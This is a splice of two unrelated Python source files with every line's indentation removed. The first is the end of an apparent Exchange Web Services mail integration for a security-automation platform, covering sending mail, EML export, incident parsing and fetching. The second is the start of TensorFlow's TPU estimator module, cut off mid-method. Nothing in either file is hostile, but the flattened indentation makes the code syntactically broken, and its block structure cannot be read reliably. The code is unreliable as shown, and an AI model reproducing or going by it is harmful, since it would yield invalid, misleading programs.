template_params = handle_template_params(templateParams)
if template_params:
body = body.format(**template_params)
if htmlBody:
htmlBody = htmlBody.format(**template_params)
message = create_message(to, subject, body, bcc, cc, htmlBody, attachments, additionalHeader)
client.send_email(message)
return 'Mail sent successfully', {}, {}
def get_item_as_eml(client: EWSClient, item_id, target_mailbox=None):
"""
Retrieve item as an eml
:param client: EWS Client
:param item_id: Item id to retrieve
:param (Optional) target_mailbox: target mailbox
:return: Output tuple
"""
account = client.get_account(target_mailbox)
item = client.get_item_from_mailbox(account, item_id)
if item.mime_content:
mime_content = item.mime_content
if isinstance(mime_content, bytes):
email_content = email.message_from_bytes(mime_content)
else:
email_content = email.message_from_string(mime_content)
if item.headers:
attached_email_headers = [
(h, " ".join(map(str.strip, v.split("\r\n"))))
for (h, v) in list(email_content.items())
]
for header in item.headers:
if (
header.name,
header.value,
) not in attached_email_headers and header.name != "Content-Type":
email_content.add_header(header.name, header.value)
eml_name = item.subject if item.subject else "demisto_untitled_eml"
file_result = fileResult(eml_name + ".eml", email_content.as_string())
file_result = (
file_result if file_result else "Failed uploading eml file to war room"
)
return file_result
def parse_incident_from_item(item):
"""
Parses an incident from an item
:param item: item to parse
:return: Parsed item
"""
incident = {}
labels = []
try:
incident["details"] = item.text_body or item.body
except AttributeError:
incident["details"] = item.body
incident["name"] = item.subject
labels.append({"type": "Email/subject", "value": item.subject})
incident["occurred"] = item.datetime_created.ewsformat()
# handle recipients
if item.to_recipients:
for recipient in item.to_recipients:
labels.append({"type": "Email", "value": recipient.email_address})
# handle cc
if item.cc_recipients:
for recipient in item.cc_recipients:
labels.append({"type": "Email/cc", "value": recipient.email_address})
# handle email from
if item.sender:
labels.append({"type": "Email/from", "value": item.sender.email_address})
# email format
email_format = ""
try:
if item.text_body:
labels.append({"type": "Email/text", "value": item.text_body})
email_format = "text"
except AttributeError:
pass
if item.body:
labels.append({"type": "Email/html", "value": item.body})
email_format = "HTML"
labels.append({"type": "Email/format", "value": email_format})
# handle attachments
if item.attachments:
incident["attachment"] = []
for attachment in item.attachments:
file_result = None
label_attachment_type = None
label_attachment_id_type = None
if isinstance(attachment, FileAttachment):
try:
if attachment.content:
# file attachment
label_attachment_type = "attachments"
label_attachment_id_type = "attachmentId"
# save the attachment
file_name = get_attachment_name(attachment.name)
file_result = fileResult(file_name, attachment.content)
# check for error
if file_result["Type"] == entryTypes["error"]:
demisto.error(file_result["Contents"])
raise Exception(file_result["Contents"])
# save attachment to incident
incident["attachment"].append(
{
"path": file_result["FileID"],
"name": get_attachment_name(attachment.name),
}
)
except TypeError as e:
if str(e) != "must be string or buffer, not None":
raise
continue
else:
# other item attachment
label_attachment_type = "attachmentItems"
label_attachment_id_type = "attachmentItemsId"
# save the attachment
if attachment.item.mime_content:
mime_content = attachment.item.mime_content
attached_email = email.message_from_bytes(mime_content) if isinstance(mime_content, bytes) \
else email.message_from_string(mime_content)
if attachment.item.headers:
attached_email_headers = [
(h, " ".join(map(str.strip, v.split("\r\n"))))
for (h, v) in list(attached_email.items())
]
for header in attachment.item.headers:
if (
(header.name, header.value)
not in attached_email_headers
and header.name != "Content-Type"
):
attached_email.add_header(header.name, header.value)
attached_email_bytes = attached_email.as_bytes()
chardet_detection = chardet.detect(attached_email_bytes)
encoding = chardet_detection.get('encoding', 'utf-8') or 'utf-8'
file_result = fileResult(
get_attachment_name(attachment.name) + ".eml",
attached_email_bytes.decode(encoding),
)
if file_result:
# check for error
if file_result["Type"] == entryTypes["error"]:
demisto.error(file_result["Contents"])
raise Exception(file_result["Contents"])
# save attachment to incident
incident["attachment"].append(
{
"path": file_result["FileID"],
"name": get_attachment_name(attachment.name) + ".eml",
}
)
labels.append(
{
"type": label_attachment_type,
"value": get_attachment_name(attachment.name),
}
)
labels.append(
{"type": label_attachment_id_type, "value": attachment.attachment_id.id}
)
# handle headers
if item.headers:
headers = []
for header in item.headers:
labels.append(
{
"type": "Email/Header/{}".format(header.name),
"value": str(header.value),
}
)
headers.append("{}: {}".format(header.name, header.value))
labels.append({"type": "Email/headers", "value": "\r\n".join(headers)})
# handle item id
if item.message_id:
labels.append({"type": "Email/MessageId", "value": str(item.message_id)})
if item.id:
labels.append({"type": "Email/ID", "value": item.id})
labels.append({"type": "Email/itemId", "value": item.id})
# handle conversion id
if item.conversation_id:
labels.append({"type": "Email/ConversionID", "value": item.conversation_id.id})
incident["labels"] = labels
incident["rawJSON"] = json.dumps(parse_item_as_dict(item, None), ensure_ascii=False)
return incident
def fetch_emails_as_incidents(client: EWSClient, last_run):
"""
Fetch incidents
:param client: EWS Client
:param last_run: last run dict
:return:
"""
last_run = get_last_run(client, last_run)
try:
last_emails = fetch_last_emails(
client,
client.folder_name,
last_run.get(LAST_RUN_TIME),
last_run.get(LAST_RUN_IDS),
)
ids = deque(
last_run.get(LAST_RUN_IDS, []), maxlen=client.last_run_ids_queue_size
)
incidents = []
incident: Dict[str, str] = {}
for item in last_emails:
if item.message_id:
ids.append(item.message_id)
incident = parse_incident_from_item(item)
incidents.append(incident)
if len(incidents) >= client.max_fetch:
break
last_run_time = incident.get("occurred", last_run.get(LAST_RUN_TIME))
if isinstance(last_run_time, EWSDateTime):
last_run_time = last_run_time.ewsformat()
new_last_run = {
LAST_RUN_TIME: last_run_time,
LAST_RUN_FOLDER: client.folder_name,
LAST_RUN_IDS: list(ids),
ERROR_COUNTER: 0,
}
demisto.setLastRun(new_last_run)
return incidents
except RateLimitError:
if LAST_RUN_TIME in last_run:
last_run[LAST_RUN_TIME] = last_run[LAST_RUN_TIME].ewsformat()
if ERROR_COUNTER not in last_run:
last_run[ERROR_COUNTER] = 0
last_run[ERROR_COUNTER] += 1
demisto.setLastRun(last_run)
if last_run[ERROR_COUNTER] > 2:
raise
return []
def fetch_last_emails(
client: EWSClient, folder_name="Inbox", since_datetime=None, exclude_ids=None
):
"""
Fetches last emails
:param client: EWS client
:param (Optional) folder_name: folder name to pull from
:param (Optional) since_datetime: items will be searched after this datetime
:param (Optional) exclude_ids: exclude ids from fetch
:return: list of exchangelib.Items
"""
qs = client.get_folder_by_path(folder_name, is_public=client.is_public_folder)
if since_datetime:
qs = qs.filter(datetime_received__gte=since_datetime)
else:
tz = EWSTimeZone.timezone('UTC')
first_fetch_datetime = dateparser.parse(FETCH_TIME)
first_fetch_ews_datetime = EWSDateTime.from_datetime(tz.localize(first_fetch_datetime))
qs = qs.filter(last_modified_time__gte=first_fetch_ews_datetime)
qs = qs.filter().only(*[x.name for x in Message.FIELDS])
qs = qs.filter().order_by("datetime_received")
result = []
for item in qs:
if isinstance(item, Message):
result.append(item)
if len(result) >= client.max_fetch:
break
if exclude_ids and len(exclude_ids) > 0:
exclude_ids = set(exclude_ids)
result = [x for x in result if x.message_id not in exclude_ids]
return result
def test_module(client: EWSClient, max_fetch):
"""
test-module
* Max incidents per fetch <= MAX_INCIDENTS_PER_FETCH
* Account can be retrieved
* Account has read rights
* Test access to fetch folder
:param client: EWS Client
:param max_fetch: Max fetches per incident
:return: "ok"
"""
try:
if int(max_fetch) > MAX_INCIDENTS_PER_FETCH:
return_error(f'Error - Max incidents per fetch cannot be greater than {MAX_INCIDENTS_PER_FETCH}. '
f'You provided: {max_fetch}')
account = client.get_account()
if not account.root.effective_rights.read: # pylint: disable=E1101
raise Exception(
"Success to authenticate, but user has no permissions to read from the mailbox. "
"Need to delegate the user permissions to the mailbox - "
"please read integration documentation and follow the instructions"
)
client.get_folder_by_path(
client.folder_name, account, client.is_public_folder
).test_access()
except ErrorFolderNotFound as e:
if "Top of Information Store" in str(e):
raise Exception(
"Success to authenticate, but user probably has no permissions to read from the specific folder."
"Check user permissions. You can try !ews-find-folders command to "
"get all the folders structure that the user has permissions to"
)
return "ok"
def sub_main():
is_test_module = False
params = demisto.params()
args = prepare_args(demisto.args())
# client's default_target_mailbox is the authorization source for the instance
params['default_target_mailbox'] = args.get('target_mailbox',
args.get('source_mailbox', params['default_target_mailbox']))
client = EWSClient(**params)
start_logging()
try:
command = demisto.command()
# commands that return a single note result
normal_commands = {
"ews-get-searchable-mailboxes": get_searchable_mailboxes,
"ews-move-item-between-mailboxes": move_item_between_mailboxes,
"ews-move-item": move_item,
"ews-delete-items": delete_items,
"ews-search-mailbox": search_items_in_mailbox,
"ews-get-contacts": get_contacts,
"ews-get-out-of-office": get_out_of_office_state,
"ews-recover-messages": recover_soft_delete_item,
"ews-create-folder": create_folder,
"ews-mark-item-as-junk": mark_item_as_junk,
"ews-find-folders": find_folders,
"ews-get-items-from-folder": get_items_from_folder,
"ews-get-items": get_items,
"ews-get-folder": get_folder,
"ews-expand-group": get_expanded_group,
"ews-mark-items-as-read": mark_item_as_read,
"send-mail": send_email,
}
# commands that may return multiple results or non-note result
special_output_commands = {
"ews-get-attachment": fetch_attachments_for_message,
"ews-delete-attachment": delete_attachments_for_message,
"ews-get-items-as-eml": get_item_as_eml,
}
# system commands:
if command == "test-module":
is_test_module = True
demisto.results(test_module(client, params.get('max_fetch')))
elif command == "fetch-incidents":
last_run = demisto.getLastRun()
incidents = fetch_emails_as_incidents(client, last_run)
demisto.incidents(incidents)
# special outputs commands
elif command in special_output_commands:
demisto.results(special_output_commands[command](client, **args)) # type: ignore[operator]
# normal commands
else:
output = normal_commands[command](client, **args) # type: ignore[operator]
return_outputs(*output)
except Exception as e:
start_logging()
debug_log = log_stream.getvalue() # type: ignore[union-attr]
error_message_simple = ""
# Office365 regular maintenance case
if isinstance(e, ErrorMailboxStoreUnavailable) or isinstance(
e, ErrorMailboxMoveInProgress
):
log_message = (
"Office365 is undergoing load balancing operations. "
"As a result, the service is temporarily unavailable."
)
if demisto.command() == "fetch-incidents":
demisto.info(log_message)
demisto.incidents([])
sys.exit(0)
if is_test_module:
demisto.results(
log_message + " Please retry the instance configuration test."
)
sys.exit(0)
error_message_simple = log_message + " Please retry your request."
if isinstance(e, ConnectionError):
error_message_simple = (
"Could not connect to the server.\n"
f"Additional information: {str(e)}"
)
else:
if is_test_module and isinstance(e, MalformedResponseError):
error_message_simple = (
"Got invalid response from the server.\n"
)
# Legacy error handling
if "Status code: 401" in debug_log:
error_message_simple = (
"Got unauthorized from the server. "
)
if "Status code: 503" in debug_log:
error_message_simple = (
"Got timeout from the server. "
"Probably the server is not reachable with the current settings. "
)
if not error_message_simple:
error_message = error_message_simple = str(e)
else:
error_message = error_message_simple + "\n" + str(e)
stacktrace = traceback.format_exc()
if stacktrace:
error_message += "\nFull stacktrace:\n" + stacktrace
if debug_log:
error_message += "\nFull debug log:\n" + debug_log
if demisto.command() == "fetch-incidents":
raise
if demisto.command() == "ews-search-mailbox" and isinstance(e, ValueError):
return_error(
message="Selected invalid field, please specify valid field name.",
error=e,
)
if is_test_module:
demisto.results(error_message_simple)
else:
demisto.results(
{
"Type": entryTypes["error"],
"ContentsFormat": formats["text"],
"Contents": error_message_simple,
}
)
demisto.error(f"{e.__class__.__name__}: {error_message}")
finally:
exchangelib_cleanup()
if log_stream:
try:
logging.getLogger().removeHandler(log_handler) # type: ignore
log_stream.close()
except Exception as ex:
demisto.error(
"EWS: unexpected exception when trying to remove log handler: {}".format(
ex
)
)
def process_main():
"""setup stdin to fd=0 so we can read from the server"""
sys.stdin = os.fdopen(0, "r")
sub_main()
def main():
# When running big queries, like 'ews-search-mailbox' the memory might not freed by the garbage
# collector. `separate_process` flag will run the integration on a separate process that will prevent
# memory leakage.
separate_process = demisto.params().get("separate_process", False)
demisto.debug("Running as separate_process: {}".format(separate_process))
if separate_process:
try:
p = Process(target=process_main)
p.start()
p.join()
except Exception as ex:
demisto.error("Failed starting Process: {}".format(ex))
else:
sub_main()
from MicrosoftApiModule import * # noqa: E402
if __name__ in ("__main__", "__builtin__", "builtins"):
main()
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import os
import signal
import sys
import threading
import time
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf.tpu import compilation_result_pb2 as tpu_compilation_result
from tensorflow.python.client import session as tf_session
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.distribute.cluster_resolver import tpu_cluster_resolver
from tensorflow.python.estimator import estimator as estimator_lib
from tensorflow.python.estimator import model_fn as model_fn_lib
from tensorflow.python.estimator.export import export_output as export_output_lib
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.summary import summary
from tensorflow.python.tpu import _tpu_estimator_embedding
from tensorflow.python.tpu import error_handling
from tensorflow.python.tpu import functional as tpu_functional
from tensorflow.python.tpu import preempted_hook
from tensorflow.python.tpu import session_support
from tensorflow.python.tpu import tensor_tracer
from tensorflow.python.tpu import tpu
from tensorflow.python.tpu import tpu_config
from tensorflow.python.tpu import tpu_context
from tensorflow.python.tpu import tpu_embedding_gradient
from tensorflow.python.tpu import tpu_feed
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop
from tensorflow.python.tpu import util as util_lib
from tensorflow.python.tpu._tpu_estimator_embedding import AdagradParameters # pylint: disable=unused-import
from tensorflow.python.tpu._tpu_estimator_embedding import AdamParameters # pylint: disable=unused-import
from tensorflow.python.tpu._tpu_estimator_embedding import StochasticGradientDescentParameters # pylint: disable=unused-import
from tensorflow.python.tpu._tpu_estimator_embedding import EmbeddingConfigSpec # pylint: disable=unused-import
from tensorflow.python.tpu.ops import tpu_ops
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import function_utils
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CTX_KEY = 'context'
_USE_TPU_KEY = 'use_tpu'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_REWRITE_FOR_INFERENCE_MODE = '_rewrite_for_inference'
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR = '_key_when_predictions_is_a_tensor'
# Ideally _USE_TPU_KEY should be reserved as well. However there are already
# models that make use of this key, thus it can not be reserved now to prevent
# breakage. In the long run, we would like to mitigate this by migrating models
# off of using _USE_TPU_KEY.
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _is_iterable(obj):
"""A Python 2 and 3 compatible util to check whether `obj` is iterable."""
try:
iter(obj)
return True
except TypeError:
return False
class CatchInvalidHostcallFunctions(control_flow_ops.XLAControlFlowContext):
def AddOp(self, op):
if op.type in [
'AudioSummary', 'AudioSummaryV2', 'HistogramSummary', 'ImageSummary',
'MergeSummary', 'ScalarSummary', 'TensorSummary', 'TensorSummaryV2'
]:
raise ValueError('Use tf.contrib.summary inside of host_calls.')
def _create_global_step(graph):
graph = graph or ops.get_default_graph()
if training.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return variable_scope.get_variable(
ops.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=dtypes.int64,
initializer=init_ops.zeros_initializer(),
trainable=False,
use_resource=True,
collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP])
def _create_or_get_iterations_per_loop():
"""Creates or gets the iterations_per_loop variable.
In TPUEstimator, the user provided computation, the model_fn, is wrapped
inside a tf.while_loop for peak performance. The iterations of the loop are
specified by this variable, which adjusts its value on the CPU after each TPU
program execution and before the next TPU execution.
The purpose of using a variable, rather then a constant, is to allow
TPUEstimator adapt the TPU training iterations according to the final steps
specified by users. For example, if the user sets the iterations_per_loop as 4
in TPUConfig and steps as 10 in TPUEstimator.train(), the iterations_per_loop
variable will have the following value before each TPU training.
- 1-th TPU execution: iterations_per_loop = 4
- 2-th TPU execution: iterations_per_loop = 4
- 3-th TPU execution: iterations_per_loop = 2
As model_fn increases the global step once per train_op invocation, the global
step is 10 after all TPU executions, matching the steps=10 inputs passed in by
users.
Returns:
A TF non-trainable resource variable.
Raises:
RuntimeError: If multi iterations_per_loop variables were found.
"""
graph = ops.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(training_util.get_global_step()):
with variable_scope.variable_scope(
_TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE):
return variable_scope.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=init_ops.zeros_initializer(),
shape=[],
dtype=dtypes.int32,
trainable=False,
collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
def _sync_variables_ops(ctx):
"""Create varriables synchronization ops.
Gets the variables back from TPU nodes. This means the variables updated
by TPU will now be *synced* to host memory.
In BROADCAST mode, we skip this sync since the variables are ususally too
big to transmit via RPC.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Returns:
A list of sync ops.
"""
if not ctx.is_input_broadcast_with_iterators():
return [
array_ops.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in variables.trainable_variables()
]
else:
return [control_flow_ops.no_op()]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU system
before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# Estimator evaluate increases 1 by default. So, we increase the difference.
return state_ops.assign_add(
eval_step,
math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
def _extract_key_names(tensor_or_dict):
if isinstance(tensor_or_dict, dict):
return sorted(tensor_or_dict.keys())
return []
class PeriodicLogger(object):
def __init__(self, seconds):
self._log_every_n_seconds = seconds
self._last_log_time = 0
def log(self, msg, *args, **kw):
if time.time() - self._last_log_time > self._log_every_n_seconds:
self._last_log_time = time.time()
logging.info(msg, *args, **kw)
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
class TPUEstimatorSpec(model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
`export_outputs`.
For evaluation, `eval_metrics `is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
`tf.estimator.Estimator`. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must have be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
a dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for MNIST example how to specify the
`eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function and returns a list of Tensors. `host_call` currently
works for train() and evaluate(). The Tensors returned by the function is
executed on the CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with `tf.contrib.summary.create_file_writer`.
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None,
training_hooks=None,
evaluation_hooks=None,
prediction_hooks=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
host_calls = {}
if eval_metrics is not None:
host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
host_calls['host_call'] = host_call
_OutfeedHostCall.validate(host_calls)
training_hooks = tuple(training_hooks or [])
evaluation_hooks = tuple(evaluation_hooks or [])
prediction_hooks = tuple(prediction_hooks or [])
for hook in training_hooks + evaluation_hooks + prediction_hooks:
if not isinstance(hook, session_run_hook.SessionRunHook):
raise TypeError('All hooks must be SessionRunHook instances, given: {}'
.format(hook))
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call,
training_hooks=training_hooks,
evaluation_hooks=evaluation_hooks,
prediction_hooks=prediction_hooks)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_calls = {}
if self.eval_metrics is not None:
host_calls['eval_metrics'] = self.eval_metrics
if self.host_call is not None:
host_calls['host_call'] = self.host_call
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
loss = self.loss
if tensor_tracer.TensorTracer.is_enabled() \
and self.train_op is not None:
tt = tensor_tracer.TensorTracer()
loss = tt.trace_cpu(ops.get_default_graph(), loss, self.train_op)
hooks = tuple(hooks or [])
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=self.training_hooks + hooks,
evaluation_hooks=self.evaluation_hooks + hooks,
prediction_hooks=self.prediction_hooks + hooks)
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
logging.debug('%s read iterations %s', self._name, iterations)
if iterations == _SIGNAL.STOP:
logging.info('%s received shutdown signal, stopping.', self._name)
return
yield iterations
def join(self):
logging.info('Shutting down %s thread.', self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shutdown TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op,
run_infeed_loop_on_coordinator=True,
rendezvous=None,
master=None,
session_config=None,
tpu_init_ops=None):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._rendezvous = rendezvous
self._master = master
self._session_config = session_config
self._init_ops = list(tpu_init_ops or [])
if ctx.embedding_config is None:
self._embedding_layer_config = None
else:
self._embedding_layer_config = (
ctx.embedding_config.tpu_embedding.config_proto)
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
# When using model parallelism, the TPU is pre-initialized at startup to
# fetch mesh information. We skip re-initializing it here to avoid
# suspected issues due to the mesh layout changing on the second
# initialization.
self._should_initialize_tpu = not ctx.model_parallelism_enabled
self._tpu_compile_op = tpu_compile_op
def begin(self):
logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
if self._should_initialize_tpu:
self._finalize_ops = [tpu.shutdown_system(job=self._master_job)]
else:
self._finalize_ops = []
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _run_infeed(self, queue_ctx, session):
logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
logging.info('Infeed thread sleeping for %d seconds.',
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
logging.info('Infeed thread starting after sleep')
with self._rendezvous.catch_errors(source='infeed', session=session):
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Infeed enqueue for iteration (%d, %d)', count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
logging.info('Infeed thread finished, shutting down.')
def _run_outfeed(self, queue_ctx, session):
logging.info('Starting outfeed thread controller.')
status_logger = PeriodicLogger(seconds=60)
with self._rendezvous.catch_errors(source='outfeed', session=session):
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i)
session.run(self._dequeue_ops)
status_logger.log('Outfeed finished for iteration (%d, %d)', count, i)
logging.info('Outfeed thread finished, shutting down.')
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def _assertCompilationSucceeded(self, result, coord):
proto = tpu_compilation_result.CompilationResultProto()
proto.ParseFromString(result)
if proto.status_error_message:
logging.error('Compilation failed: {}'.format(proto.status_error_message))
coord.request_stop()
else:
logging.info('Compilation succeeded')
def after_create_session(self, session, coord):
if self._should_initialize_tpu:
logging.info('Init TPU system')
start = time.time()
with ops.Graph().as_default():
with tf_session.Session(
self._master, config=self._session_config) as sess:
sess.run(
tpu.initialize_system(
job=self._master_job,
embedding_config=self._embedding_layer_config))
logging.info('Initialized TPU in %d seconds', time.time() - start)
session.run(self._init_ops,
options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000))
if os.environ.get('TPU_SPLIT_COMPILE_AND_EXECUTE', '') == '1':
logging.info('Compiling user program: this may take a while...')
self._assertCompilationSucceeded(session.run(self._tpu_compile_op), coord)
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
# Enable the worker watchdog to terminate workers on coordinator exit.
watchdog_timeout = int(os.environ.get('TF_TPU_WATCHDOG_TIMEOUT', '0'))
if watchdog_timeout > 0:
session_support.start_worker_watchdog(session,
shutdown_timeout=watchdog_timeout)
def before_run(self, run_context):
iterations = run_context.session.run(self._iterations_per_loop_var)
logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations)
self._infeed_controller.send_next_batch_signal(iterations)
logging.info('Dequeue next (%d) batch(es) of data from outfeed.',
iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
logging.info('Stop infeed thread controller')
